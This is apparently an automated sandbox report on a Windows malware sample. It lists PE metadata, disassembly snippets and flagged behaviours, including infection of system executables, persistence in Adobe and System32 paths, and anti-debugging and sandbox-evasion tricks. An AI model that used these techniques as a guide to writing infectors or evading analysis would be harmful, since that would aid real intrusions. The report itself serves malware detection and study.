          Source: Binary string: wntdll.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: real checksum: 0x1fb4b should be: 0x19172d
          Source: armsvc.exe.0.drStatic PE information: section name: .didat
          Source: alg.exe.0.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5520C push 02F5528Fh; ret 0_2_02F5522D
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5B180 push 02F5B0CAh; ret 0_2_02F5B061
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5B180 push 02F5B30Dh; ret 0_2_02F5B1E6
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5B180 push 02F5B2F2h; ret 0_2_02F5B262
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5B180 push 02F5B255h; ret 0_2_02F5B2ED
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5B180 push 02F5B2D0h; ret 0_2_02F5B346
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F5B180 push 02F5B37Fh; ret 0_2_02F5B3B7
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F7852Eh; ret 0_2_02F77F3A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78514h; ret 0_2_02F77F66
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F77E66h; ret 0_2_02F78057
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F7817Ah; ret 0_2_02F7808B
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F782E5h; ret 0_2_02F780D9
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F7826Ah; ret 0_2_02F7819E
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F7849Ch; ret 0_2_02F781E4
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78321h; ret 0_2_02F782E0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F77FBFh; ret 0_2_02F7831F
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F77FA8h; ret 0_2_02F7834C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F784BAh; ret 0_2_02F783E2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78426h; ret 0_2_02F784D8
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78075h; ret 0_2_02F784FD
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F7808Ch; ret 0_2_02F78512
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78D45h; ret 0_2_02F787D3
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78AB5h; ret 0_2_02F78B13
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78784h; ret 0_2_02F78CA1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78DC9h; ret 0_2_02F78E1C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78D14h; ret 0_2_02F78E2E
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F78674h; ret 0_2_02F78E4D
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F788A6h; ret 0_2_02F78F76
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F78550 push 02F7868Ch; ret 0_2_02F78FA4
          Source: LiuUGJK9vH.exeStatic PE information: section name: .reloc entropy: 7.938033667934618
          Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.94301967209562

          Persistence and Installation Behavior

          barindex
          Creates files in the system32 config directory
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a49546759c90d829.binJump to behavior
          Drops executable to a common third party application directory
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F7CBD0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeAPI/Special instruction interceptor: Address: BA520C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7096E rdtsc 4_2_03B7096E
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-110178
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeAPI coverage: 5.1 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe TID: 2868Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 1996Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
          Source: AppVClient.exe, 00000008.00000003.1475204828.0000000000599000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000008.00000002.1481720566.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000008.00000003.1474643358.0000000000591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineI
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeAPI call chain: ExitProcess graph end nodegraph_0-108733
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B7096E rdtsc 4_2_03B7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417D33 LdrLoadDll,4_2_00417D33
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_0056C594 mov eax, dword ptr fs:[00000030h]0_2_0056C594
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00BA54D8 mov eax, dword ptr fs:[00000030h]0_2_00BA54D8
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00BA5478 mov eax, dword ptr fs:[00000030h]0_2_00BA5478
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00BA3E58 mov eax, dword ptr fs:[00000030h]0_2_00BA3E58
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F51130 mov eax, dword ptr fs:[00000030h]0_2_02F51130
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F93F3D mov eax, dword ptr fs:[00000030h]0_2_02F93F3D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28397 mov eax, dword ptr fs:[00000030h]4_2_03B28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28397 mov eax, dword ptr fs:[00000030h]4_2_03B28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B28397 mov eax, dword ptr fs:[00000030h]4_2_03B28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E388 mov eax, dword ptr fs:[00000030h]4_2_03B2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E388 mov eax, dword ptr fs:[00000030h]4_2_03B2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2E388 mov eax, dword ptr fs:[00000030h]4_2_03B2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5438F mov eax, dword ptr fs:[00000030h]4_2_03B5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5438F mov eax, dword ptr fs:[00000030h]4_2_03B5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]4_2_03B4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]4_2_03B4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]4_2_03B4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B663FF mov eax, dword ptr fs:[00000030h]4_2_03B663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h]4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE3DB mov eax, dword ptr fs:[00000030h]4_2_03BDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE3DB mov eax, dword ptr fs:[00000030h]4_2_03BDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]4_2_03BDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE3DB mov eax, dword ptr fs:[00000030h]4_2_03BDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD43D4 mov eax, dword ptr fs:[00000030h]4_2_03BD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD43D4 mov eax, dword ptr fs:[00000030h]4_2_03BD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEC3CD mov eax, dword ptr fs:[00000030h]4_2_03BEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B383C0 mov eax, dword ptr fs:[00000030h]4_2_03B383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B383C0 mov eax, dword ptr fs:[00000030h]4_2_03B383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B383C0 mov eax, dword ptr fs:[00000030h]4_2_03B383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B383C0 mov eax, dword ptr fs:[00000030h]4_2_03B383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB63C0 mov eax, dword ptr fs:[00000030h]4_2_03BB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C0634F mov eax, dword ptr fs:[00000030h]4_2_03C0634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2C310 mov ecx, dword ptr fs:[00000030h]4_2_03B2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B50310 mov ecx, dword ptr fs:[00000030h]4_2_03B50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A30B mov eax, dword ptr fs:[00000030h]4_2_03B6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A30B mov eax, dword ptr fs:[00000030h]4_2_03B6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A30B mov eax, dword ptr fs:[00000030h]4_2_03B6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD437C mov eax, dword ptr fs:[00000030h]4_2_03BD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C08324 mov eax, dword ptr fs:[00000030h]4_2_03C08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C08324 mov ecx, dword ptr fs:[00000030h]4_2_03C08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C08324 mov eax, dword ptr fs:[00000030h]4_2_03C08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C08324 mov eax, dword ptr fs:[00000030h]4_2_03C08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB035C mov eax, dword ptr fs:[00000030h]4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB035C mov eax, dword ptr fs:[00000030h]4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB035C mov eax, dword ptr fs:[00000030h]4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB035C mov ecx, dword ptr fs:[00000030h]4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB035C mov eax, dword ptr fs:[00000030h]4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB035C mov eax, dword ptr fs:[00000030h]4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BFA352 mov eax, dword ptr fs:[00000030h]4_2_03BFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD8350 mov ecx, dword ptr fs:[00000030h]4_2_03BD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h]4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B402A0 mov eax, dword ptr fs:[00000030h]4_2_03B402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B402A0 mov eax, dword ptr fs:[00000030h]4_2_03B402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C062D6 mov eax, dword ptr fs:[00000030h]4_2_03C062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC62A0 mov eax, dword ptr fs:[00000030h]4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC62A0 mov eax, dword ptr fs:[00000030h]4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC62A0 mov eax, dword ptr fs:[00000030h]4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC62A0 mov eax, dword ptr fs:[00000030h]4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC62A0 mov eax, dword ptr fs:[00000030h]4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E284 mov eax, dword ptr fs:[00000030h]4_2_03B6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E284 mov eax, dword ptr fs:[00000030h]4_2_03B6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB0283 mov eax, dword ptr fs:[00000030h]4_2_03BB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB0283 mov eax, dword ptr fs:[00000030h]4_2_03BB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB0283 mov eax, dword ptr fs:[00000030h]4_2_03BB0283
